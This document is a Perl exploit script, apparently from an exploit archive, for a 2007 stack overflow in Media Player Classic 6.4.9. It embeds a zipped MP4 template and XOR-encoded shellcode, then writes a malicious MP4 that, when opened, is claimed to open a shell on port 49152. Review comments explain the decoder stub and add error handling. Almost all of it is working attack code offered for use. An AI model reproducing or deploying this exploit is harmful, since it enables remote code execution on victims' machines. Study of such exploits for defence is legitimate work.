# Title : Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit
# Published : 2007-12-08
# Author : SYS 49152
#!/bin/perl
#
# Media Player Classic 6.4.9 MP4 Stack Overflow
#
# 0-day discovered and exploited by SYS 49152
#
# Tested on win XP SP2 ENG
# Shell on port 49152 (author's claim; the embedded payload appears to be
# XOR-encoded in this listing, so decode and verify it before relying on it)
#
# usage:
# - install this codec so that MPC can handle MP4 content:
# http://www.3ivx.com/coral/3ivx_d4_451_win.exe
#
# - run this script; it writes SYS_49152_MP4_for_MPC.mp4 (and a
#   temporary tempzip.zip) into the current directory
#
# - open that MP4 file with mplayerc.exe
#
# SYS 49152
# gforce(put the @ here)operamail(put the . here)com
#
# update:
# the latest 5.0.1 codec is still vulnerable
use Archive::Zip qw( :ERROR_CODES :CONSTANTS );
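# Minimal zip archive (775 bytes) carried inline so the script needs no
# external file.  It holds a single deflate-compressed member,
# "SYS_49152_MP4_for_MPC.mp4" (header fields: compressed size 0x273,
# uncompressed size 0x457), followed by the central directory
# ("PK\x01\x02") and the end-of-central-directory record ("PK\x05\x06").
# Every "\x.." escape below must keep its backslash: the listing this was
# taken from had them stripped, which turns the data into literal text
# and breaks the archive.  Declared with `my` to match $shellcode below.
my $zip_data = # code 724981
"\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3".
"\x13\xD9\x53\x73\x02\x00\x00\x57\x04\x00\x00\x19\x00\x00\x00".
"\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66".
"\x6F\x72\x5F\x4D\x50\x43\x2E\x6D\x70\x34\x63\x60\x60\xBF\x9C".
"\x9B\x9F\x5F\xC6\xC0\xC0\x90\x93\x5B\x96\x91\x02\xA4\x19\x0E".
"\xBC\xF1\x2B\x3B\xF0\x26\x2C\x99\x81\x81\xF9\x05\x88\xCF\xC0".
"\x08\x46\x08\x80\xC2\xC1\xE4\x3B\x30\xE0\x05\x40\xD5\xEC\xF1".
"\xA5\x29\x25\x89\x40\x3A\x3C\x37\x15\x44\x83\x81\x62\x46\x4A".
"\x4E\x11\x4C\x51\x6E\x4A\x66\x51\x62\x41\x41\x0E\x92\x3E\x76".
"\xAD\xCC\x9C\xE2\x12\x20\x43\x62\x65\x5E\x62\x2E\x90\x16\x48".
"\x49\x04\x6B\x86\x59\x2F\xB1\xB2\xBC\xA8\x04\xAB\xB8\x63\x50".
"\x08\x56\xF1\xC4\x9C\x24\x4C\x71\x36\xF3\x95\xC9\xB9\x40\x73".
"\x98\x6F\x21\x8B\x4F\x40\x02\xAC\x4C\x8C\xBE\xBA\x8C\x8C\xBE".
"\x0E\xBE\x0D\x37\x80\x04\x90\x62\x85\x50\x8C\x10\xCA\x01\x42".
"\x75\x41\xA8\x06\x08\x55\x0A\xA1\x58\x20\x14\x37\x84\xFA\xE4".
"\xFB\x9A\x0C\xD0\x9D\x16\xEE\xE0\xCC\xF1\xB3\xA4\xE3\xF5\x84".
"\x41\x03\x5E\xBF\x16\xCD\x99\xE0\x3A\xD1\x97\x95\x05\x12\x36".
"\x01\xBE\x87\x83\x23\x83\x4D\x2C\x0D\x4D\x8D\x14\x82\x42\x7D".
"\x5C\xA3\x14\x8D\x4F\x36\xBF\xDC\x70\xF3\xDD\xCD\x12\x95\x2F".
"\xD1\x8D\xC5\xC2\x2B\x5C\xBF\xEE\x68\x7E\xFD\xE7\xD1\x97\x10".
"\x7D\xB9\xAF\x0E\x7B\xB8\xDC\xC3\x55\xEB\xAE\xF4\x24\xD6\xFD".
"\x9D\x72\xAE\x73\xEF\x05\x17\x29\xE3\xE7\xB1\x75\xCF\x3B\x5C".
"\xE4\x3E\x2A\x17\xD6\xED\x74\x2B\x31\x55\x64\x39\x68\x7A\x66".
"\x7D\x8B\xFD\xD6\x95\xED\x72\x3E\x93\x05\x2F\x4E\xB8\xBB\xA0".
"\xEE\x79\x8F\x8B\xDC\x3D\x65\xCF\x7D\xC6\xDF\x23\xBF\x04\xAF".
"\xCE\xAC\x33\x3C\x92\xF8\xF2\x66\x76\x89\xDE\x1D\x65\xB6\xA3".
"\xC6\x2F\x3C\xEB\x4E\x6C\x79\x51\xF7\x63\x81\xF4\x5C\xB3\x67".
"\xDE\x92\x2F\xC2\x27\x4F\x7E\x7D\x4E\xF7\x58\xD7\x01\xA3\xB6".
"\xAE\xEF\x82\x5C\x19\x07\xFA\x24\x5C\x26\x8B\x72\xE5\x7D\x3F".
"\x23\x70\x4F\x73\xC5\xDF\x5D\x7F\xF5\xBF\xBB\x57\xE8\xEA\x6C".
"\x8C\x7D\xB1\xC8\xBD\x4E\x6C\xD9\xEB\xDF\x62\xDB\x5E\xBF\x16".
"\xE3\xCA\x38\xA7\x6B\xBA\xE3\x9C\x58\x4D\xA4\xAD\x6E\xE0\xA2".
"\x1B\x4D\x40\x39\xFD\xA7\x2F\xFF\xEE\x52\xBD\xC0\xF3\xE2\x76".
"\xE0\xFF\x5D\xCA\xAF\x41\x6C\x5F\x9E\xE2\x8F\x40\xF6\x8B\x3F".
"\x82\x0B\xDC\x2B\xAE\xCD\x8D\xBF\xD8\xDC\xF3\x3E\x7C\x32\x90".
"\xAD\x3C\xFF\xCE\x39\xDD\x69\x57\x15\x17\xCC\x7F\xF1\x31\xC7".
"\xD2\xD0\x5F\x7F\xA3\xA1\x57\x89\xA9\x37\xD3\xEE\xED\x53\xC3".
"\xD8\x6F\x6A\xAB\xDA\x9F\x15\x66\x7E\x37\xF7\x54\xD8\xB7\xC7".
"\xEE\x77\x19\xB9\xF2\x3E\x0B\x2D\x7F\xF9\x53\x64\xFE\xCE\x9F".
"\x22\x0B\x5E\x86\x4F\x9D\x2B\x5A\xE8\x60\xFD\x3A\x7C\xF2\x7C".
"\xF7\xF0\x22\xAE\x0C\x65\x21\x4E\xEB\x1C\x45\xAE\xBC\x5F\x40".
"\xFB\xDC\xBB\x45\x6F\xFC\xDE\xA5\xEC\x5E\x01\x0C\xC4\x52\x70".
"\x52\x4E\x4F\xCD\xC3\x92\xC4\x15\x4A\x8A\xB2\x41\xE2\x12\x50".
"\x71\x74\xA0\x90\x92\x59\x9C\x8D\x47\x5E\xAA\x24\xB7\x20\x1F".
"\x48\x0B\x41\xE5\x45\xE1\x32\x92\xC9\x05\x99\xA0\xDC\x29\x88".
"\x2E\xC3\x91\x0B\x14\x01\x00\x50\x4B\x01\x02\x14\x00\x14\x00".
"\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3\x13\xD9\x53\x73\x02\x00".
"\x00\x57\x04\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x20\x00\x00\x00\x00\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31".
"\x35\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x4D\x50\x43\x2E".
"\x6D\x70\x34\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x47\x00\x00\x00\xAA\x02\x00\x00\x00\x00";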
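# 344-byte payload written into the extracted MP4 at offset 619.  The first
# 24 bytes look like a self-decoding stub (xor ecx,ecx / sub ecx,-0x50 /
# fldz / fnstenv [esp-0xC] / pop ebx / xor dword [ebx+0x13],0xB8F545A8 /
# sub ebx,-4 / loop), i.e. the remaining 80 dwords appear to be XOR-encoded
# with key 0xB8F545A8 and are decoded at run time.  The "shell on port
# 49152" claimed in the header therefore cannot be confirmed from these
# bytes without decoding them first.  Every "\x.." escape must keep its
# backslash; the listing this was taken from had them stripped.
my $shellcode = # code 724981
"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".
"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".
"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".
"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".
"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".
"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".
"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".
"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".
"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".
"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".
"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".
"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".
"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".
"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".
"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".
"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".
"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".
"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".
"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".
"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".
"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".
"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".
"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";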
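# Materialise the embedded zip on disk, pull the MP4 template out of it and
# overwrite the bytes at offset 619 of that template with the payload.
# Every step checks its result: Archive::Zip signals failure through the
# AZ_* codes imported at the top of the file rather than by dying, so an
# unchecked read()/extractMember() would only surface later as a confusing
# "Can't Open" error on the missing member.  The "\n" escapes were lost in
# the listing this was taken from and are restored here.
# NOTE(review): the file has no `use strict`/`use warnings`; enabling them
# also requires declaring $zip_data with `my` where it is assigned.
my $temp_zip = 'tempzip.zip';
my $member   = 'SYS_49152_MP4_for_MPC.mp4';
my $code_off = 619;    # where the payload is spliced into the extracted member

open(my $zip_fh, '>', $temp_zip) or die "Can't Write temporary File\n";
binmode($zip_fh);
print {$zip_fh} $zip_data;
close($zip_fh) or die "Can't Write temporary File: $!\n";   # buffered write errors surface here
print "\nTemporary file ready, patching..\n";

my $zip = Archive::Zip->new();
$zip->read($temp_zip) == AZ_OK
    or die "Can't read $temp_zip as a zip archive\n";
$zip->extractMember($member) == AZ_OK
    or die "Can't extract $member from $temp_zip\n";
unlink $temp_zip;    # the member is on disk now; the container is no longer needed

open(my $mp4_fh, '+<', $member) or die "Can't Open temporary File\n";
binmode($mp4_fh);
seek($mp4_fh, $code_off, 0)
    or die "Can't seek to offset $code_off in $member: $!\n";
print {$mp4_fh} $shellcode;
close($mp4_fh) or die "Can't write $member: $!\n";
print "Shellcode added, have fun!\n";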